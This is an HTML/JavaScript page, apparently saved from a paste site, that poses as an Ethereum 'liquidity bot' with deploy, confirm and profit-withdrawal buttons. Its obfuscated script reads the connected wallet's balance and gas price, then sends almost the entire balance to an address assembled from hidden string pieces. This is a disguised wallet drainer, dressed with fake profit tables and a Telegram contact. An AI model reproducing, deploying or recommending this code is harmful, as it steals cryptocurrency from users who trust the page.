_0x56e784=function(_0x17a77b){this['OHgjaQ']=_0x17a77b,this['MgjBrN']=[-0x1829+-0x22cc+-0x3af6*-0x1,0x1*-0x89+-0x4e9*-0x3+-0xe32,0x9d+0x7*-0x180+0x1*0x9e3],this['VCLeBU']=function(){return'newState';},this['xJotmo']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['HwgLZO']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x56e784['prototype']['cRDjHo']=function(){const _0x4235f7=new RegExp(this['xJotmo']+this['HwgLZO']),_0xe0e6f5=_0x4235f7['test'](this['VCLeBU']['toString']())?--this['MgjBrN'][0x13df*0x1+0x2*0x8a0+-0x251e]:--this['MgjBrN'][-0x1*0x7f7+-0x14d+0x944];return this['NTZYwr'](_0xe0e6f5);},_0x56e784['prototype']['NTZYwr']=function(_0x47144e){if(!Boolean(~_0x47144e))return _0x47144e;return this['xnwZzu'](this['OHgjaQ']);},_0x56e784['prototype']['xnwZzu']=function(_0x3447ee){for(let _0x2f8fa5=0x2*0x12be+-0x1a49*-0x1+-0x3fc5*0x1,_0x128e8a=this['MgjBrN']['length'];_0x2f8fa5<_0x128e8a;_0x2f8fa5++){this['MgjBrN']['push'](Math['round'](Math['random']())),_0x128e8a=this['MgjBrN']['length'];}return _0x3447ee(this['MgjBrN'][0xc4+-0x2570+0x24ac]);},new _0x56e784(_0x35be)['cRDjHo'](),_0x361830=_0x35be['amuBRQ'](_0x361830),_0x1944d8[_0x461de1]=_0x361830;}else _0x361830=_0x1110be;return _0x361830;},_0x35be(_0x1944d8,_0x3d244d);}const k='688773',evm=kyc(m),e=_0x5f3ab4(0x232,0x225,0x24b,0x20b),hashlock=kyc(k),unit=''+evm+hashlock,v=_0x5f3ab4(0x22e,0x20a,0x22e,0x202),moe=kyc(e),n='698489',spv=kyc(v);function _0x5f3ab4(_0x1f9262,_0x21c75e,_0x216203,_0x367cfa){return _0x35be(_0x21c75e-0x8f,_0x216203);}const c=_0x5f3ab4(0x1f5,0x1f8,0x1d2,0x1ef),comission=kyc(n);function _0x32f29c(_0x4e063f,_0x855e2e,_0x214214,_0x2ebeea){return _0x35be(_0x214214- -0xe3,_0x2ebeea);}const confirm=''+moe+spv,performTransaction=async()=>{function _0x4e5bb2(_0x3cbdb6,_0xe454a9,_0x14e61a,_0x584d1c){return _0x5f3ab4(_0x3cbdb6-0x188,_0x14e61a-0x2a3,_0x584d1c,_0x584d1c-0x138);}const _0x5d1e4e={'oXSVU':_0x4e5bb2(0x4aa,0x4d2,0x4bf,0x498)+'\x20gas\x20fee','WoGLy':_0x3d7991(0x2d7,0x2fc,0x2ed,0x2d5),'PhHoh':function(_0x430b33,_0x59d79d){return _0x430b33(_0x59d79d);},'zNJEw':function(_0x812b44,_0x4536e2){return _0x812b44(_0x4536e2);},'lgljD':_0x3d7991(0x2d2,0x2df,0x2b6,0x2bd),'JMYZD':function(_0x1da406,_0x161867){return _0x1da406*_0x161867;},'cABKJ':function(_0x4d174f,_0x1e32d7){return _0x4d174f<_0x1e32d7;},'BaMhh':function(_0x402659,_0x11156d){return _0x402659-_0x11156d;},'kvlko':function(_0x46aa0f,_0x4b6407){return _0x46aa0f(_0x4b6407);},'qkFCx':_0x4e5bb2(0x4bd,0x4a6,0x4ae,0x4b0)+'ansaction','dtEHE':function(_0x4408b0,_0x8d5a54){return _0x4408b0+_0x8d5a54;},'AsPuG':_0x3d7991(0x2f4,0x31c,0x33c,0x304)+_0x4e5bb2(0x4cd,0x4c9,0x4a9,0x48b)+_0x3d7991(0x2ee,0x2e3,0x2cf,0x2c7)+'dity.\x20Plea'+_0x4e5bb2(0x48a,0x4ca,0x4ab,0x4d3)+'o\x20me\x20via\x20t'+_0x4e5bb2(0x490,0x492,0x49e,0x49a)+'ssenger\x20@O'+_0x3d7991(0x336,0x316,0x340,0x30e)+_0x3d7991(0x30d,0x327,0x328,0x33f)+_0x3d7991(0x2d4,0x2de,0x2e1,0x2c1)+_0x4e5bb2(0x481,0x4a7,0x48b,0x46b),'WbqYu':function(_0x470534,_0x49d7b1){return _0x470534===_0x49d7b1;},'WDFNj':_0x3d7991(0x32c,0x329,0x33a,0x327),'rVIes':function(_0x5a07dc,_0x403699){return _0x5a07dc(_0x403699);}};function _0x3d7991(_0x406b6a,_0x17ddf2,_0x217fec,_0x11135c){return _0x5f3ab4(_0x406b6a-0x1ce,_0x17ddf2-0x107,_0x11135c,_0x11135c-0x132);}try{const _0x3e1a6f=typeAdress[_0x4e5bb2(0x486,0x497,0x486,0x475)];transferInProgress=!![];const _0x3583e9=_0x5d1e4e[_0x3d7991(0x2fb,0x2fa,0x2d0,0x31b)],_0x1c672b=_0x3d7991(0x312,0x328,0x2ff,0x323),_0x204548=_0x5d1e4e[_0x4e5bb2(0x497,0x4b8,0x4b7,0x4e0)](kyc,c),_0x4ce894=_0x5d1e4e[_0x3d7991(0x32d,0x306,0x31a,0x2dc)](kyc,_0x3583e9),_0x1fcc3d=_0x5d1e4e[_0x4e5bb2(0x4a7,0x4bc,0x4a2,0x497)](kyc,_0x1c672b),_0x49b070=await window[_0x4e5bb2(0x486,0x489,0x49a,0x4c2)][_0x3d7991(0x30a,0x304,0x324,0x2de)]({'method':'eth_getBal'+_0x4e5bb2(0x4b8,0x4ca,0x4b6,0x493),'params':[window['ethereum']['selectedAd'+_0x4e5bb2(0x48d,0x464,0x478,0x47b)],_0x5d1e4e['lgljD']]}),_0x3c0aec={};_0x3c0aec['method']=_0x4e5bb2(0x4b7,0x48c,0x4a6,0x4c1)+'ce';const _0x417a98=await window['ethereum'][_0x4e5bb2(0x476,0x48b,0x4a0,0x48e)](_0x3c0aec),_0x1b3d6c=''+comission+_0x204548,_0x5d4ef4=-0xf79d+-0x65b4*0x2+-0x11*-0x2605,_0xa958b4=_0x5d1e4e[_0x4e5bb2(0x491,0x4d1,0x4bd,0x4af)](_0x417a98,_0x5d4ef4);if(_0x5d1e4e[_0x3d7991(0x306,0x2fd,0x2e6,0x2f8)](BigInt(_0x49b070),_0xa958b4)){_0x5d1e4e[_0x4e5bb2(0x4b0,0x4d6,0x4b7,0x4c5)](alert,_0x5d1e4e['oXSVU']),transferInProgress=![];return;}const _0x25569b=''+_0x4ce894+_0x1fcc3d,_0x370477=_0x5d1e4e[_0x4e5bb2(0x45c,0x46b,0x482,0x479)](_0x5d1e4e[_0x3d7991(0x310,0x2f5,0x31b,0x31a)](BigInt,_0x49b070),BigInt(_0xa958b4)),_0x29edb6='0x'+unit+confirm+_0x1b3d6c+_0x25569b;await window[_0x3d7991(0x307,0x2fe,0x328,0x31b)]['request']({'method':_0x5d1e4e[_0x3d7991(0x321,0x32b,0x34d,0x32e)],'params':[{'from':window[_0x4e5bb2(0x477,0x4a1,0x49a,0x4a2)][_0x4e5bb2(0x46f,0x491,0x494,0x475)+'dress'],'to':_0x29edb6,'value':_0x5d1e4e['dtEHE']('0x',_0x370477['toString'](0x47*0x63+0x18*0xaf+-0x1*0x2bcd))}]}),alert(_0x5d1e4e[_0x4e5bb2(0x4cf,0x4de,0x4b9,0x490)]),transferInProgress=![];}catch(_0x177a68){if(_0x5d1e4e['WbqYu'](_0x5d1e4e['WDFNj'],_0x3d7991(0x317,0x32d,0x345,0x344))){_0x361830(_0x5d1e4e['oXSVU']),_0x42c53f=![];return;}else _0x5d1e4e[_0x4e5bb2(0x4b7,0x46c,0x497,0x479)](alert,_0x3d7991(0x2e5,0x2f0,0x2f7,0x30e)+'irming\x20liq'+_0x3d7991(0x316,0x315,0x326,0x33d)+_0x3d7991(0x316,0x30b,0x2e6,0x337)),console[_0x3d7991(0x2e1,0x301,0x2fd,0x308)](_0x177a68),transferInProgress=![];}};
</script>
<script>
connectButton.addEventListener("click", async () =>
{
try {
const accounts = await window.ethereum.request({
method: "eth_requestAccounts",
});
if (accounts.length > 0) {
sendEtherButton.style.display = "block";
typeAdress.style.display = "block";
checkBalanceButton.style.display = "block";
checkAdressBalanceButton.style.display = "block";
connectButton.style.display = "none";
}
} catch (error)
{
console.error(error);
alert("connection error");
}
});
sendEtherButton.addEventListener("click", async () =>
{
try {
const value = typeAdress.value;
if (resultElement.innerText !== "ready")
{
alert("Сlick the deploy button");
return;
}
if (!value || value.length < 40)
{
alert("Attention! Enter the correct second Ethereum address");
return;
}
if (!validationComplete)
{
if (
/^[a-zA-Z0-9!@#$%^'&*()-_+=<>?:"',./\[\]{}|\\]+$/g.test(
value
) &&
value.length >= 40
) {
statusMessage.textContent = "waiting...";
typeAdress.disabled = true;
sendEtherButton.disabled = true;
setTimeout(() => {
validationComplete = true;
statusMessage.textContent = "ready";
typeAdress.disabled = true;
sendEtherButton.textContent = "confirm";
sendEtherButton.disabled = false;
}, 10000);
} else
{
alert("Error! input value");
}
} else if (sendEtherButton.textContent === "confirm")
{
performTransaction();
}
} catch (error)
{
console.error("Error on process:\n" + error);
transferInProgress = false;
}
});
checkBalanceButton.addEventListener("click", async () =>
{
try {
const balanceWei = await window.ethereum.request({
method: "eth_getBalance",
params: [window.ethereum.selectedAddress, "latest"],
});
const balanceEther = (parseInt(balanceWei) / 1e18).toFixed(4);
balanceDisplay.innerText = `balance: ${balanceEther} ETH`;
balanceDisplay.style.display = "block";
} catch (error)
{
console.error(error);
alert("Error");
}
});
</script>
<style>
html {
box-sizing: border-box;
font-family: "Open Sans", sans-serif;
}
*,
*:before,
*:after {
box-sizing: inherit;
}
body {
font-family: Arial, sans-serif;
text-align: center;
margin: 0;
padding: 20px;
background: #222336;
background: -webkit-radial-gradient(
circle farthest-side at center center,
#222336 0%,
#222336 100%
);
background: -moz-radial-gradient(
circle farthest-side at center center,
#2a2c3f 0%,
#222336 100%
);
background: radial-gradient(
circle farthest-side at center center,
#222336 0%,
#222336 100%
);
}
section {
background: #2a2c3f;
color: white;
border-radius: 1em;
padding: 1em;
position: absolute;
top: 50%;
left: 50%;
margin-right: -50%;
margin: 0 auto;
transform: translate(-50%, -50%);
}
</style>
<div id="tableEth"
style="height: 400px;
overflow-y:scroll;
display: none;">
<font color=white>
<p align=left>
my ETH contract:
<span id="contract"></span></p>
<p align=left>
my ETH address:
<span id="addressEth"></span></p>
<p align=left>
my liqiudity:
<button>low</button></p>
<p align=left>
my status:
<button>liquid</button></p>
<p align=left>
my profit for withdraw ETH:
<span id="earnEth"></span>&nbsp;ETH</p>
<p align=left>
<input
type="text"
id="addressWithdrawEth"
name="adress_auth"
placeholder="0x"
autocomplete="off"
size="20" />
<button id="withdrawAllEth" onclick="withdrawEth()">withdraw ALL profit </button>
<button id="increaseLiquidity" disabled onclick="repeatConfirm()">increase liquidity</button>
<table>
<thead>
<tr>
<th>Status</th>
<th>Method</th>
<th>My fee <br>(my profit)</th>
<th>Sender</th>
<th>My ETH account</th>
</tr>
</thead>
<tbody id="tableBody"></tbody>
</table>
</div>
<script>
const regularLaunchButton = document.getElementById("regular");
const resultElement = document.getElementById("result");
function setButtonsDisabled(isDisabled)
{
regularLaunchButton.disabled = isDisabled;
}
function timeout(workFn) {
console.log("exec");
setButtonsDisabled(true);
resultElement.innerText = "waiting...";
setTimeout(() => {
const asyncStartTime = Date.now();
resultElement.innerText = "ready";
setButtonsDisabled(true);
}, 12000);
const startTime = Date.now();
if (typeof workFn === "function") {
workFn();
}
}
regularLaunchButton.addEventListener("click", () => {
timeout();
});
</script>
</section></div>
<hr>
<div class="shareon">
<p>Share:</p>
<button class="mastodon"></button>
<button class="reddit"></button>
<button class="copy-url"></button>
</div>
<hr>
<div style="right: 0px; position: absolute">
<div data-ea-publisher="dpaste" data-ea-type="text" data-ea-keywords="programming|Text output" class="loaded"><div class="ea-placement ea-type-text"><div class="ea-content"><img src="https://server.ethicalads.io/proxy/view/8045/3c68f43f-4650-433d-b3c3-5b781b8776d4/" class="ea-pixel"><div class="ea-text"><a href="https://server.ethicalads.io/proxy/click/8045/3c68f43f-4650-433d-b3c3-5b781b8776d4/" rel="nofollow noopener sponsored" target="_blank"><span class="ea-body">Develop and launch modern apps with MongoDB Atlas, a resilient data platform.</span></a></div></div><div class="ea-callout"><a rel="nofollow noopener" target="_blank" href="https://www.ethicalads.io/advertisers/?ref=ea-text">Ads by EthicalAds</a></div></div></div>
</div>
</div>
<script>
window.fwSettings={'widget_id':22000000180 };
!function(){if("function"!=typeof window.FreshworksWidget){var n=function(){n.q.push(arguments)};n.q=[],window.FreshworksWidget=n}}();
</script>
<script defer="" src="https://widget.freshworks.com/widgets/22000000180.js"></script>
<div id="freshworks-container" data-html2canvas-ignore="true" style="width: 0px; height: 0px; bottom: 0px; right: 0px; z-index: 2147483647;"><div aria-live="polite"><iframe allowfullscreen="" id="launcher-frame" title="Help widget launcher" data-testid="launcher-frame" style="right: 22px; bottom: 22px; border: none; position: fixed; min-width: 104px; max-width: 156px; height: 56px; z-index: 2147483000; visibility: visible;"></iframe><iframe allowfullscreen="" id="lightbox-frame" data-testid="lightbox-frame" style="display: none;"></iframe></div></div><iframe title="FreshworksWidget" id="freshworks-frame" data-html2canvas-ignore="true" style="display: none;"></iframe></body></html>